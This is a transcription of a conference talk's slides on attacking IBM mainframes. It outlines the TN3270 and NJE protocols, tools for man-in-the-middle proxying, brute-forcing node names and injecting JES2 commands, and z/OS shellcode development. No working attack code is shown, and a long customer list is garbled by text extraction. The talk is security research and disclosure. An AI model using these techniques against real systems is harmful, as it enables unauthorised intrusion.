Further Adventures in Mainframe Hacking
Transcription
Further Adventures in Mainframe Hacking
Security Necromancy: Further Adventures in Mainframe Hacking B.U.M. Corp. Confidential mainframed767 & bigendiansmalls 0" Genesis • Wondered: Who’s researching this shit? – Windows 4,951 – Mac OSX 2,270 – z/OS (mainframe) Source (cvedetails.com) B.U.M. Corp. Confidential mainframed767 & bigendiansmalls ZERO?? WTF • Imagine if you will … Your Doctor calls IBM"System"z"believes"that"the"details"of"Security"/"Integrity" APARs"should"not"be"made"publically"" available." With"the"criBcal"workloads"running"on"these"systems,"the" impact"of"a"vulnerability"being"exploited,"however,"" could"severely"damage"customer"operaBons"and"business."" One"of"the"benefits"for"not"providing"vulnerability"details"is" that"both"external"aIackers"and"internal"personnel"threats" can"not"get"access"to"informaBon"that"could"put"an" enterprise"at"undue"risk."" Source"(ibm.com,"DOC#"ZSQ03054SUSENS03)" B.U.M. Corp. Confidential mainframed767 & bigendiansmalls $100,000 Brick B.U.M. Corp. Confidential mainframed767 & bigendiansmalls So who are you? • We’re just two cools dudes • And we are gonna rock your fucking socks off B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B I G S M A L L S E N D I A N B.U.M. Corp. Confidential mainframed767 & bigendiansmalls ! B Cut my teeth on AS400 I Love puzzles, breaking things G S ! M ! Woke up in a panic – because of Mainframe! E A N I could get access to my own L ! Realized ! Started D Exploit dev research ! Wrote first z/OS shellcode (check your CD) L I A life to helping poor, unfortunate S ! Dedicating N corporations secure their shit " B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls ! “in” to mainframes in the 90s courtesy of datapac (a Canadian x.25 network) ! Security Consultant ! Got my own mainframe " Realized its not as great as engineers have said (shocker!) ! I’ve spoken domestically and internationally ! Released multiple tools from password sniffing to user enumeration " B.U.M. Corp. Confidential mainframed767 & bigendiansmalls WTF is a Mainframe? Picture is worth a thousand words: B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Reality • Used by almost all fortune 100s – 90% according to IBM! – But seriously look at this: B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Pepsico"INC"S"HarYord"Life"S"UBS"S"City"of"Phoenix"Phoenix"Az"USA"David"DeBevec"S"GCCPC"S"State"of"Alabama"Child"Support"Enforcement"Services"S"Jefferies"Bank"S" Bank" Vontobel" S" Duke" Power," DB2" apps" S" Polfa" Tarchomin" S" Extensity" S" Patni" S" FPL" S" Wellpoint" S" Standard" Insurance" S" Fulton" County" S" Zagrebacka" Banka" (ZABA)" S" Community"Loans"of"America"S"WGV"S"NAV"S"InformaBon"Builders"S"AIG"Global"Services"S"T."Rowe"Price"S"Macro"Sob"S"Commerzbank"S"Macy's"Systems"and"Technologies" S"Phoenix"Home"Life"S"United"States"Postal"Service"—"Mainframe"Ops"S"United"Technologies"S"APIS"IT"S"Bajaj"Allianz"S"Universität"Leipzig"S"Abraxas"S"PRT"(Puerto"Rico" Telephone"S"Claro)"S"VISA"Inc."S"Taiwan"CooperaBve"Bank"Taiwan"S"Reserve"Bank"of"India"(www.rbi.org.in)"S"GEICO"Atlanta"GA"Insurance"S"GaranB"Technology"Istanbul" Turkey" S" Chrysler" S" Marist" College" S" GEORGIA" STATE" UNIVERSITY" S" Blue" Cross" Blue" Shield" MD" S" Self" Employed" Consultant" S" Mpowerss" S" TD" Ameritrade" S" Seminole" Electric"S"TD"Ameritrade"S"Modern"Woodmen"of"America"S"TIAASCREF"S"VF"Corp."S"CiB"/"Primerica"S"Comerica"Bank"S"American"Family"Insurance"S"Alliance"Data"Systems" (Texas" and" Ohio)" S" United" Parcel" Service" Inc" S" American" General" S" Farm" Bureau" Financial" Services" S" IBM" Global" Services" S"Abraxas" S" SLK" sobware" S" Brown" Brothers" Harriman"(BBH)"S"EDEKA"S"Mainframe"Co"Ltd"S"Guardian"Life"S"Enbridge"Gas"DistribuBon"S"SE"Tools"S"Southern"Company"S"Equifax"Inc"S"HSBC"S"IRS"S"Watkins(now"part"of" Fedex)"S"ForBs"S"General"Dynamics"S"United"States"Steel"S"TAG"S"Bank"of"America"S"Pitney"Bowes"(Danbury,"Ct.)"S"OFD"S"Infotel"S"Sainsburys"Plc"S"IRS,"New"Carrolton"MD"S" TIMKEN"S"TSSystems"S"Palm"Beach"County"School"District"The"School"District"of"Palm"Beach"County"West"Palm"Beach"FL"USA"George"Rodriguez"S"Emory"Univ"S"WIPRO" Technologies"S"Experian"Americas"S"Lawrence"Livermore"NaBonal"Laboratories,"Livermore,"CA"S"Helsana"S"Vertex"(only"SeaIle"area)"S"Suntrust"Banks"Inc"S"AMB"Generali" S"Casas"Bahia"S"Express"Scripts"S"Harland"Clarke"(John"H."Harland"Co)"S"Medical"College"of"Georgia"S"Waddell"&"Reed"FInancial"Services"S"Praxair"(Danbury,"Ct.)"S"Avnet"S" BMW"S"Ryder"Trucks"Miami"FL"USA"S"COVANYS"S"Emblem"Health"S"Bank"of"New"York"Mellon"(BNY)"(BK)"New"York"NY,"PiIsburgh,"PA"and"Nashville,"TN,"EvereI"S"Allied" Irish"Bank"AIB"(www.aib.ie)"S"VISA"Inc."S"MAJORIS"S"AARP"S"Logica"Inc"S"Matera"S"R+V"S"Texas"A&M"University"Colleg"StaBon"TX"USA"S"Riocard"TI"S"United"Missouri"Bank"S" R"R"Donlley"S"TechData"S"SERPRO"S"GreatSWest"Life"S"UNUM"Disability/Insurance"Portland"ME"Columbia"SC"S"Lloyds"Banking"Group"S"DST"S"ACS"State"Healthcare"S"IBM" Global"Services"S"Travelport"S"State"Farm"Ins"S"CDSI"S"ABSA"Bank"S"Maintec"Technologies"Inc."S"TESCO"Bangalore"India"Sivaprasad"Vura"S"MINDTREE"S"CAP"GEMINI"S"Mass" Mutual"S"AOK"S"TD"Auto"Finance"S"Blue"Cross"Blue"Shield"TN"S"Applabs"S"NaBonal"Life"Group"S"VOLVO"IT"Corp."S"United"Health"Care"(UHG)"S"Banco"Itau"S"CEPROMAT"S" Total"Systems"S"University"of"California"at"Berkeley,"CA"S"DEVK"Köln"S"HewleI"Packard"S"M&T"Bank"S"University"of"Chicago"Chicago"IL"USA"S"FreddieMac"S"RHB"bank"S" Commonwealth"Automobile"Reinsurers"S"Ecolab,"Inc"S"Montreal"S"Ford"S"HPS4"S"Bic"Banco"S"Bank"Vontobel"S"Time"Customer"Service"S"Phoenix"Companies"S"Alcatel"S" Turner"BroadcasBng"TBS"S"Motor"Vehicles"Admin"S"Avon"Brasil"S"IBM"S"GwinneI"County"School"District"S"SunGard"S"CSC"S"WIPRO"(exSInfoCrossing)"USA"Outsourcing"S" Strate"(www.Strate.co.za)"S"Pioneer"Life"Insurance"S"Rite"Aid"S"GwinneI"Medical"Center"S"GMAC"SmartCash"S"BNP"Paribas"Paris"France"S"Lender"Processing"Services" (LPS)"S"Bank"Rakyat"Indonesia"(BRI)"S"Nike"INC"S"Tampa"General"S"CPS"S"PCCW"S"ADP"S"Wellmark"S"Blue"Cross"Blue"Shield"SC"S"RBSLynk"S"Ameriprise"(American"Express" Financial" Advisors)" S" Chubb" S" MASCON" S" SAS" InsBtute" NC" USA" S" Thomson" FinancialSTransacBon" Services" S" Washington" State" Employment" Security" Department" S" AliComp" www.alicomp.com" S" AAFES" S" Merlin" InternaBonal" S" Veteran" Affairs" S" Donovan" Data" Systems" (ManhaIan)" S" Avon" (Westchester)" S" Sloan" KeIering" (Bronx)" S" Shands" HealthCare" S" Wellpoint" S" MFX" Fairfax" Morristown" NJ" USA" KLCameron" Outsourcing" S" Virginia" Department" of" Motor" Vehicles" S" ONCOR" Dallas" TX" USA" S" DST" Output"S"NaBon"Wide"Insurance"S"Riyad"Bank"S"Bank"Central"Asia"(BCA)"S"Eddie"Bauer"S"ScienBfic"Games"InternaBonal,"Inc"S"Commerzbank"S"Lousiana"Housing"Fin"Ag"/" Baton" Rouge" CC" S" Broward" County" Schools" S" Verizon" (Wireless)" S" Master" Card" INC" S" Connecture" S" Atos" Origin" S" L&T" S" Capco" S" Accenture" S" Georgia" State" Dept" of" EducaBon"S"Cathy"Pacific"S"GE"Financial"Assurance"S"ING"S"Fidelity"Investments"Boston"MA"&"New"York"S"PATNI"S"Maersk"Lines"(Global"Container"Shipping),"S"TCS"S"BriBsh" Airways"S"GAVI"S"CVS"pharmacy"S"First"NaBonal"Bank"S"LabCorp"S"Klein"Mgt."Systems"(Westchester)"S"H."E."BuI"Grocery"Co."S"Duke"Energy"S"Vanguard"Group"S"Kaiser" Permanente" Corona" CA" USA" S" State" Auto" Insurance" S"BiSLo" S" MARTA" S" EDS" S" DHL" IT" Services" S" Charles" Schwab" S" CPU" Service" S" Virginia"Dept" of" CorrecBons" S"Cielo" S" Business"Connexion"(www.bcx.co.za)"S"Lockheed"S"Fiat"S"Symetra"S"CiB"S"Collabera"S"Bank"of"America"(was"NaBons"Bank"–"Can"work"out"of"AlphareIa"office)"S"FIS"S"State" of"Montana"S"Accenture"S"PWC"S"State"of"GA"S"DHS"S"Bank"Indonesia"(BI)"S"Publix"S"Porto" Seguro"S"General"Motors"Detroit"AusBn"Atlanta"Phoenix"S"CPQD"S"BB&T"S" Partsearch"Technologies"S"ISO"(Jersey"City)"S"HMS"S"Depository"Trust"and"Clearing"Corp"S"VISA"Inc."S"EDB"ErgoGroup"S"US"Bank"S"Federal"Reserve"S"CoSoperators"Canada"S" OCIT","Sacramento"Cty"S"Progressive"Insurance"S"ZETO"S"MetaVante"(Now"Fidelity)"S"Ford"Motor"Co"S"University"System"of"Georgia"S"California"Casualty"Management" Company,"San"Mateo"and"Sacramento,"CA"S"PSP"S"Thomson"Reuters"S"RBS"(Royal"Bank"of"Scotland)"S"Aurum/BSPR"S"Social"Security"S"GKVI"S"Kohls"Department"Stores"S" FIS"S"New"York"Times"(ManhaIan)"S"CIGNA"S"SunGard"Computer"Services"Voorhees"NJ"S"Florida"Power"&"Light"(FPL)"Juno"Beach"FL"USA"UBlity"S"Fiserv"(formerly"Check" Free)" S" H&W" Computer" Systems," Inc." S" CA" Technologies" S" Treehouse" Sobware," Inc." hIp://www.treehouse.com" S" Ohio" Public" Employees" ReBrement" System" S" Montefiore"Hospital"(Bronx)"S"Air"New"Zealand"S"KEANE"S"Blue"Cross/Blue"Shield"of"Texas"S"CoIon"States"Mutual"Ins"Company"S"PKO"BP"Warszawa,"Poland"S"S"Insurance" Services" Office" S" CiBgroup" S" Liberty" Life" S" Thomson" Reuters" S" Royal" Bank" of" Canada" (RBC)" S" M&T" Bank" S" Medstar" Health" hIp://www.medstarhealth.org" S" Infosys" S" Maersk"Data"(Global"LogisBcs/Shipment"Tracking)"S"Missouri"Gas"Energy"Kansas"City"MO"USA"KLCameron"UBlity"S"Choice"Point"S"Express"Scripts"S"VETTRI"S"Wellogic"S" Arby’s"–"Wendy’s"Group"S"Bacen"www.bcb.gov.br"S"BNP"Paribas"ForBs"Brussels"Belgium"S"Alcan"Global"ATI"S"C&S"Wholesale"Grocers"S"United"States"Postal"Service"S" B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Princeton" ReBrement" Group" Inc" S" POLARIS" S" Georgia" Farm" Bureau" Mutual" S" MBT" S" May" bank" S" BMW" S" AIG" S" EDEKA" S" Delloits" S" Iflex" S" Bank" of" Tokyo" (Jersey" City)" S" Crawford"and"Company"S"Meredith"Corp"S"Express"Scripts"S"Home"Depot"U.S.A.,"Inc."S"Broadridge"Financial"Services"S"NMBSSHolding"hIp://www.nmbsSholding.be"S" PrudenBal" S" KPN" S" Bank" of" Montreal" (BMO:CN)" S" Montreal" S" Union" Bank" S" R+V" S" AlcatelSLucent" S" DATEV" eG" S" Delta" Air" Lines" Inc" S" Pershing" LLC" S" Physicians" Mutual" Insurance"Company"(PMIC)"Omaha"NE"USA"KLCameron"Insurance"S"Morgan"Stanley"(Brooklyn)"S"ScoBabank"S"CSI"InternaBonal"OH"USA"Jon"Henderson,"COO"S"Coca"Cola" Enterprises"S"Amadeus"Data"Processing"S"Zions"BancorporaBon"S"Ciber"S"GwinneI"County"S"VW"S"Banco"Bradesco"S"Target"INC"S"Copel"S"Blue"Cross"Blue"Shield"AL"S"LDS"S" IPACS"S"ZETO"S"Office"Depot"Deerfield"&"DelRay"S"Air"France"S"Capital"One"S"Glen"Allen/West"Creek"S"Emigrant"Savings"Bank"S"Consist"S"Siemens"S"JPMorgan"Chase"S" Banco"Davivienda"S"QBE"the"Americas"S"Lubhansa"Systems"S"Metlife"S"United"States"Postal"Service"—"Mainframe"Ops"S"Tata"Steel"S"Franklin"Templeton"S"United"Parcel" Service"Inc"(UPS)"S"Nest"S"Kawasaki"Motors"Corp"S"AT&T"/"BellSouth"/"Cingular"S"HSBC"GLT"S"Medical"Mutual"of"Ohio"Cleveland"OH"USA"CooperMA"S"TSSystem"S"NYS"Dept" of"Tax"and"Fin"S"HealthPlan"Services"S"OFD"S"State"of"California"Teale"Data"Center,"Rancho"Cordova,"CA"S"CEF"S"Delphi"S"Tivit"hIp://www.Bvit.com.br"S"Igate"Hyderabad" India"Sivaprasad"Vura"S"Atlanta"Journal"ConsBtuBon"S"ManhaIan"Associates"S"Helsana"S"MHS"S"FannieMae"S"S1"S"HDFC"Bank"S"Great"Lakes"Higher"EducaBon"Corp."S" Norfork"Southern"Railway"S"SCHLUMBERGER"Sema"S"United"Health"Group"(UHG)"S"Union"Pacific"Omaha"NE"USA"KLCameron"TransportaBon"S"Outsourcing"deTecnica" deSistemas"S"Hardware"S"CSX"S"Deutsche"Bundesbank"S"TD"Canada"Trust"S"Computer"Sciences"CorporaBon"(CSC)"S"Highmark"S"Rubbermaid"S"IGS"S"Edward"Jones"St."Louis" MO"Tempe"AZ"USA"S"Ministry"of"Interior"(NIC)"S"IBM"S"ScoI"Trade"S"EMC"S"Bank"InternaBonal"Indonesia"(BII)"S"CIC"S"Parker"Hannifin"Cleveland"Ohio"USA"Cooperma"S" Paccar" S" Deutsche" Bundesbank" S" Deutsche" Bank" S" Global" SMS" Networks" Pvt." Ltd." (" GLOBALSMSC" )" S" Chase" S" Genuine" Auto" Parts" (" MoBon" Industries)" S" Hexaware" S" Virginia" State" Corp," Commission" S" Customs" &" Border" Enforcement" (CBE)" S" Protech" Training" [hIp://www.protechtraining.com]" Training," ConsulBng" &" Sobware" PiIsburgh" PA" USA" S" NBNZ" S" ING" NA" Insurance" Corp" S" IBM" Tucson," Arizona" Sobware" Development" Laboratory" (DFSMShsm," Copy" Services)" S" AtlanBc" Pacific" Tea" Company"(A&P)"S"CTS"S"AMB"Generali"S"WIPRO"S"State"of"Florida"S"Northwest"Regional"Data"Center"S"Brotherhood"Bank"&"Trust"S"Walmart"S"VW"S"MINDTEK"S"Philip" Morris"S"InterconBnental"Hotels"Group"S"Dekalb"County"S"Allstate"S"UBca"Insurance"UBca"NY"USA"Insurance"–"Emirates"S"Assurance"S"New"York"University"S"Primerica" Life"Ins"Co"S"Krasdale"Foods,"Inc."S"Prokarma"Hyderabad"India"Sivaprasad"Vura"S"North"Carolina"State"Employees'"Credit"Union"S"Commerce"Bank"Kansas"City"MO"USA"S" First"Data"S"UPS"(Paramus,"NJ)"S"Credit"Suisse"S"State"of"Illinois"S"Central"Management"Services"(CMS)"S"Springfield,"IL"S"Penn"Mutual"S"United"States"Postal"Service"—" Mgmt"Ops"S"MASTEK"S"LBBW"(Landesbank"Baden"WuerIemberg)"S"DIGITAL"S"CiB"S"ELCOT"S"Wakefern"Food"Corp"S"BI"Moyle"Associates,"Inc."S"Steria"S"Acuity"LighBng" Group" Inc.." S" HMC" Holdings" (ManhaIan)" S" ANZ" Bank" S" Banco" do" Brasil" S" Allianz" Assurancies" S" DATEV" eG" S" Puget" Sound" Energy" (SeaIle)" S" Charles" Schwab" S" Serasa" Experian"S"TECO"S"WinnSDixie"S"BelasBngdienst"S"Lubhansa"Systems"S"GAP"Inc"S"HCL"S"Chemical"Abstract"Services"(CAS)"S"ProdeSP"S"United"States"Postal"Service"S"DB2" DBA"Ops"S"Assurant"S"Prodam"SP"S"Bank"Nasional"Indonesia"(BNI46)"S"Norfolk"Southern"Corp"S"AON"HewiI"S"ITERGO"S"Aegon"S"State"of"Georgia"S"Trinity"Health"S"AIG"S" PNC"Bank"PiIsburgh"PA"USA"S"Washington"State"Department"of"Social"and"Health"Services"S"Credit"Suisse"S"Aviva"S"ELIT"S"FINA"S"Finanz"InformaBk"S"Jackson"NaBonal"S" BMC"Sobware"S"Group"Health"CooperaBve"S"Media"Ocean"(office"here,"HQ"most"likely"New"York)"S"Grady"Hospital"S"Ameritech"S"Allianz"Assurancies"S"HewleISPackard"S" Merrill"Lynch"(now"BOA)"S"Miami"Dade"County"S"IBM"Silicon"Valley"Laboratory,"San"Jose,"CA"(home"of"DFSMS,"DB2,"IMS,"languages)"S"RedeCard"S"ConnecBcut,"State"of" (various" Departments" including" TransportaBon," Public" Safety," and" InformaBon" Technologies)" S" UBS" APAC" (Union" Bank" of" Switzerland)" S" ZETO" S" WGV" S" Conseco" S" Atlanta"Housing"Authority"S"NaBonal"Life"Ins."Co."S"CollecBve"Brands"S"SAS"S"FIS"S"TD"Ameritrade"S"Navistar"S"LDS"S"Target"India"S"Dominion"Power/Dominion"Resources"S" Glen"Allen/Innsbrook"S"US"Sobware"S"Voith"S"Thrivent"S"LBBW"(Landesbank"Baden"WuerIemberg)"S"State"of"Alabama"S"Bank"of"America"(BAC)"S"Ford"S"SATHYAM/PCS"S" Fiducia"S"Amadeus"Data"Processing"S"State"of"AZ"S"ADOT"S"IBM"India"S"Florida"Power"&"Light"S"PSA"Peugeot"Citroen"S"Mphasis"S"ADP,"Inc."S"City"of"Tulsa"S"Energy"Future" Holdings"Dallas"Tx"USA"S"CGI"S"Boston"Univerity"S"University"of"NC"S"Atos"Origin"S"Key"Bank"S"AFLAC"S"IBM"Global"Services"S"YRCW"S"Lincoln"NaBonal"S"Sobware"Paradigms" India"S"logica"CMG"S"Fujitsu"America"Dallas"TX"KLCameron"Outsourcing"S"Southern"California"Edison"S"CEF"S"Mt."Sinai"(Bronx)"S"Blue"Cross"Blue"Shield"S"HSBC"Trinkaus"&" Burkhardt"AG"S"Mainline"InformaBon"Systems"S"Schneider"NaBonal"Green"Bay"WI"USA"KLCameron"TransportaBon"S"Publix"S"John"Dere"S"PSC"Electrical"ContracBng"S" Family"Life"Ins."Co."S"DTC"(ManhaIan)"S"Eaton"Cleveland"Ohio"USA"Cooper"MA"S"Russell"Stovers"S"AEP"S"Alcatel"S"Axa"(Jersey"City)"S"ACS"(Texas)"S"Mutual"of"America"S" Liberty" Mutual" (Safeco" Insurance)" S" Medicare" S" Statens" UddannelsesstøIe" S" Lowe's" S" Bank" Of" America" S" TUI" S" IVV" S" Aetna" S" Sanepar" S" Sentry" Insurance" S" Fiserv" IntegraSys" S" State" of" ConnecBcut" (various" Departments" including" Public" Safety," TransportaBon," InformaBon" Technologies)" S" Bovespa" S" City" of" New" York" (Several" locaBons)"S"Con"Edison"(ManhaIan)"S"City"of"Atlanta"S"GM"S"UBS"S"Krakatau"Steel"Cilegon"Indonesia"S"ITERGO"S"Blue"Cross"Blue"Shield"GA"S"Scope"InternaBonal(Standard" Chatered)" S" Rutgers" University" S" Office" of" IT" S" GM" S" Santander" S" State" of" Alaska" S" AIG" Global" Services" S" Atos" Origin" S" CA" Technologies" S" Garuda" Indonesia" Jakarta" Indonesia"Gun"gun"S"Leumi"Bank"Leumi"Bank"TelSAviv"ISrael,"Shai"Perry"S"Cognizant"Technology"SoluBons"S"Barclays"bank"S"Heartland"Payment"Systems"(Texas)"S"Xerox"S" State"of"GA"S"DOL"S" SYNTEL" S" Canadian" Imperial" Bank" of" Commerce" (CIBC)" S" Friedkin" InformaBon" Technology"Houston"TX"USA"S"NASDAQ"Stock"Market"S"Mahindra" Satyam"S"CocaSCola"Co"S"SIAC"(Brooklyn)"S"Sears"Holdings"CorporaBon"S"Finanz"InformaBk"S"Fiducia"S"Metro"North"(ManhaIan)"S"FedEx"S"KEONICS"S"Ahold"S"NY"City," B.U.M. Corp. Confidential Various"Agencies"S"IBM"S"CA"Technologies"S"Principal"Financial"Group"S"Georgia"Pacific"S"Governor's"Office"S"Kansas"City"Life"S"Old"Mutual"S"Catapiller"S"Amtrak"S"CTS"S"City" and"County"of"Alameda,"California"S"Ceridian"S"DPF"S"USAA"S"Traveler's"Insurance"S"Roundy's"Supermarkets"Milwaukee"WI"USA"S"Lexis"Nexis"(formerly"ChoicePoint"Inc)"S" MarrioI"Hotel"S"United"States"Postal"Service"Applic."Dev."S"XANSA"S"Auto"Zone"S"EDS"S"Manulife"S"State"of"GA"S"GTA"S"Washington"State"Department"of"TransportaBon" mainframed767 & bigendiansmalls Two Parts • First Half: Networking – Network Job Entry – TN3270 protocol fun! • Second Half: Exploit Development – How to write exploits – Program debugging – Shellcode development – First z/OS Shellcode B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Butt first You need a quick refresher on what this looks like this: B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Networking B.U.M. Corp. Confidential mainframed767 & bigendiansmalls TN3270 • Imagine a world where telnet still exists • Imagine no MORE! B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls TN3270 • Imagine a world where telnet still exists • Imagine no MORE! • Basically like BBS’s back in the day • Uses a ‘stream’ B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Field Attributes • Screen is 1920 bytes long • Each byte could be a field attribute identifying: " Color " Locked/Unlocked (Protected) " Visible/Invisible (Hidden) B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Locked Field Length USERPG01) B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Identifyin’ • No support in nmap/other tools • Hard to identify screens – Without getting an emulator • What about Hidden Fields? • Or Protected Values? B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Until NOW! B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls NEW! • TN3270 Library for NMAP • Emulates a ‘real’ 3270 screen • Allows you to: – Connect – Show the screen – Send commands – Detect hidden fields! B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Samesies VTAM Application IDs VTAM Macros B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Hidden Fields! !" B.U.M. Corp. Confidential !" mainframed767 & bigendiansmalls But Wait! There’s more! I wrote one in LUA why not Python? B.U.M. Corp. Confidential mainframed767 & bigendiansmalls tn3270lib • Support tn3270 (not E) • Creates a tn3270 object • Allows for sending commands • Blah blah blah same as nmap BUT NOW IT MEANS I CAN INTRODUCE: B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls 3 modes • Proxy/Passthrough – MitM • Mirror a targetted mainframe – Connects, scrapes the screen, then shares that screen on your machine – Takes commands you might expect your target to send and pregrabs those screens as well • No args: TSO logon screen B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls SET’n’3270 • Supports SSL Which is cool cause clients don’t check certs (like, at all, no warning no nothing) B.U.M. Corp. Confidential mainframed767 & bigendiansmalls More Tools • Big Iron Recon and Pwnage – By Dominic White! – https://github.com/sensepost/birp • Mainframe Brute – Slower but prolly more reliable – https://github.com/sensepost/mainframe_brute B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Network Job Entry B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Jobs (not steve) • JCL (Job Control Language) • Run by “JES” • Made up of – STEPS – ProGraMs – etc B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Network Job Entry • Also known as NJE • Runs on ports 175, 2252 (SSL) • Developed in the 80s (??) B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Works like this B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Initial Setup • Systems configure JES telling them: – Where to connect – Who they will accept connections from How? B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Number of Nodes Our Node Name Other nodes ‘WASHDC’ IP Address B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Connect Connect TCPIP “OPEN” “ACK” From: Network Job Entry (NJE) Formats and Protocols (SA32-0988-00) B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Once established • You can send JCL • You can send NMR (command/control records) • You are now a ‘trusted’ node – Depending on your security, of course B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Interesting ‘feature’ • Users from one node don’t need to log on • When a job is sent, the userID is sent along with the ‘NJE’ job • So long as that account exists on the receiving side it will work. B.U.M. Corp. Confidential mainframed767 & bigendiansmalls NO Password Note: no password or any authentication information is sent. Nodes are TRUSTED and therefore no need to re-authenticate. B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Breaking NJE • First we need to find mainframes with NJE • Problem: nmap B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls NJE Node Names • You need this. • No, you NEED it. • You can’t connect otherwise NMAP Script: NJE Node Brute • Brute forces node names (even if the node is connected!) B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls NJE is super awesome • Like we said before: You need three things: – Node Name of your target – Node name you want to pretend to be – IP Address of your target With these you can inject JES2 commands with: B.U.M. Corp. Confidential mainframed767 & bigendiansmalls iNJEctor.py B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Books from the Past! • A lot of our research is from really old books • Like, really old • Older than some of you here today: B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Exploit Development B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Architecture • 23,31,64 bit modes – 3 sets of registers (16 ea) – Big Endian – Von Neumann Architecture – Stack-based (sorta) • Virtual Address Spaces • Program Status Word (PSW) • Z/OS, USS, Z/Linux, Z/VM B.U.M. Corp. Confidential mainframed767 & bigendiansmalls DC in a box JAVA" LINUX" ASM" PL/I" WEB" WEBSPHERE" COBOL" AND"MORE!" CLOUD" MQ" HTTP" C" C++" JAVASCRIPT" MOBILE" B.U.M. Corp. Confidential UNIX" DB2" mainframed767 & bigendiansmalls Where to start • Focus on what you know • Unix System Services • Why? Cause C and Assembler – Narrowed down to: • Buffer Overflow POC • Format String Exploit POC • Learn testing environment • Shell code development and deployment B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Setup" Memory" Args"and" Execute" B.U.M. Corp. Confidential Cleanup"&" Exit" mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Useful example • Execute local shell – Useful for Privilege Escalation • Steps – Build working C or HLASM – Convert to machine code – Once working, “shellcode-ize” • Remove bad chars or encode – Test with C buffer stub program B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls B.U.M. Corp. Confidential mainframed767 & bigendiansmalls What’s Next? • • • • • MSF Integration? Native Exploits Java / Web exploits Privilege Escalation Continued Tool development / Porting – Generic shellcode building – Fuzzi B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Thanks • • • • • • DEFCON for letting us talk about this IBM for this cool platform and online books Huge Mega Corps for neglecting this platform Dominic White for his tools Swedish underground community X3270 authors B.U.M. Corp. Confidential mainframed767 & bigendiansmalls Contact • Phil - “Soldier of Fortran” @mainframed767 [email protected] Soldieroffortran.org • Chad – “Big Endian Smalls” @bigendiansmalls [email protected] Bigendiansmalls.com B.U.M. Corp. Confidential mainframed767 & bigendiansmalls